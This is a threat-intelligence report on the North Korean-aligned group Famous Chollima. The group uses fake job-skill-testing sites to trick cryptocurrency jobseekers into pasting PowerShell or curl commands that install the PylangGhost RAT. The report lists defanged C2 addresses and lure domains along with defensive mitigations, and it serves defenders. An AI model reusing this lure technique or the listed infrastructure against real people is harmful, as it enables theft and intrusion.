Full Report
Learn how the North Korean-aligned Famous Chollima is using the a new Python-based RAT, "PylangGhost," to target cryptocurrency and blockchain jobseekers in a campaign affecting users primarily in India.
Analysis Summary
# Threat Actor: Famous Chollima (aka Wagemole)
## Attribution & Identity
* **Attribution:** North Korean-aligned threat actor.
* **Known Aliases/Associations:** Wagemole. Potentially made up of multiple groups.
* **New Development:** In May 2025, identified using a new Python-based RAT named "PylangGhost." Also continues to use the pre-existing Golang-based "GolangGhost" RAT.
## Activity Summary
* The group has been highly active since mid-2024.
* **Primary Campaign:** Deploying fake job advertisements and skill-testing pages to compromise victims. This tactic is part of a two-pronged approach aiming for financial benefit (by harvesting personal information) and implanting malicious "fake employees" in targeted companies.
* **Infection Vector:** Targets are misled into visiting fake skill-testing sites impersonating real companies (e.g., Coinbase, Robinhood, Uniswap). After answering questions, targets are prompted to download a payload disguised as a video driver installation fix via a malicious command-line execution (ClickFix).
* **OS Targeting:** Latest campaigns specifically target Windows and macOS systems; Linux users are not being targeted.
## Tactics, Techniques & Procedures
* **Initial Access:** Spearphishing/Deceptive appearance via fake job interview/skill testing sites.
* **Execution:** Instructing victims to copy, paste, and execute malicious command lines (PowerShell's `Invoke-Webrequest` or `curl`) containing the payload instructions.
* **Persistence/Defense Evasion:** Uses a fake "driver installation" lure to execute malicious code. The initial stage downloads a ZIP containing PylangGhost modules and a VBS file (`update.vbs`) to unzip and launch the Python interpreter running the RAT payload (`nvidia.py`).
* **Payloads:** Utilizes Golang-based RAT (GolangGhost) and a functionally equivalent Python-based RAT (PylangGhost) for Windows systems.
* **Data Staging:** Uses components identifiable by file hashes (e.g., `command.py`, `config.py`, `update.vbs`).
## Targeting
* **Sectors:** Individuals with experience in **cryptocurrency and blockchain technologies** (e.g., software engineers, marketers, designers seeking roles at associated firms).
* **Geography:** Predominantly **India** affected based on initial intelligence.
* **Victims:** Real software engineers, marketing employees, designers, and other workers applying for roles advertised by fake recruiters associated with companies like Coinbase, Archblock, Robinhood, Parallel Studios, and Uniswap.
## Tools & Infrastructure
* **Malware families used:** PylangGhost (Python RAT, new in 2025), GolangGhost (Golang RAT, documented previously).
* **Infrastructure (C2 Servers):**
* hxxp://31[.]57[.]243[.]29:8080
* hxxp://154[.]58[.]204[.]15:8080
* hxxp://212[.]81[.]47[.]217:8080
* hxxp://31[.]57[.]243[.]190:8080
* **Infrastructure (Download Hosts):** api[.]quickcamfix[.]online, api[.]auto-fixer[.]online, api[.]quickdriverupdate[.]online, api[.]camtuneup[.]online, api[.]driversofthub[.]online, api[.]drive-release[.]cloud, api[.]vcamfixer[.]online, api[.]nvidia-drive[.]cloud, api[.]nvidia-release[.]us, api[.]autodriverfix[.]online, api[.]camdriversupport[.]com, api[.]smartdriverfix[.]cloud, api[.]drivercams[.]cloud, api[.]camtechdrivers[.]com, api[.]web-cam[.]cloud, api[.]camera-drive[.]org, api[.]nvidia-release[.]org, api[.]fixdiskpro[.]online, api[.]autocamfixer[.]online
* **Infrastructure (Fake Interview Sites):** krakenhire[.]com, yuga[.]skillquestions[.]com, uniswap[.]speakure[.]com, doodles[.]skillquestions[.]com, www[.]hireviavideo[.]com, kraken[.]livehiringpro[.]com, quiz-nest[.]com, www[.]smartvideohire[.]com, www[.]talent-hiringstep[.]com, provevidskillcheck[.]com, skill[.]vidintermaster[.]com, digitaltalent[.]review, robinhood[.]ecareerscan[.]com, evalswift[.]com, livetalentpro[.]com, quantumnodespro[.]com, evalassesso[.]com, parallel[.]eskillora[.]com, coinbase[.]talentmonitoringtool[.]com, uniswap[.]testforhire[.]com, coinbase[.]talenthiringtool[.]com, crosstheages[.]skillence360[.]com, parallel[.]eskillprov[.]com, assesstrack[.]com, talent-hiringtalk[.]com, uniswap[.]prehireiq[.]com, fast-video-recording[.]com.
## Implications
Famous Chollima demonstrates advanced social engineering capabilities focused on technology sectors, particularly those related to cryptocurrency/blockchain. Their use of platform-specific malicious code delivery (PowerShell for Windows, Bash for macOS) and the development of functionally equivalent RATs in different languages (Go and Python) suggests adaptability and a commitment to maintaining operational access against diverse client operating systems. The secondary objective of implanting "fake employees" poses a significant internal threat risk to targeted organizations.
## Mitigations
* **Security Awareness Training:** Educate employees, especially job applicants and technical staff, on recognizing sophisticated social engineering lures, such as fake job application portals or required "driver updates."
* **Execution Control:** Implement strict controls (e.g., AppLocker, Windows Defender Application Control) to restrict the direct execution of PowerShell or Command Shell scripts and Python interpreters from user profile or temp directories.
* **Command Line Scrutiny:** Implement monitoring for suspicious command-line usage, specifically `Invoke-Webrequest` or `curl` commands originating from unexpected user activity, particularly those involving ZIP decompression upon execution.
* **Network Monitoring:** Monitor outbound connections to the known C2 IP addresses and suspicious download domains, especially those associated with driver/webcam support or auto-fix utilities.
* **Endpoint Defense:** Ensure endpoint security solutions specifically detect and block Python execution chains initiated in this manner and flag known malware hashes associated with PylangGhost/GolangGhost modules.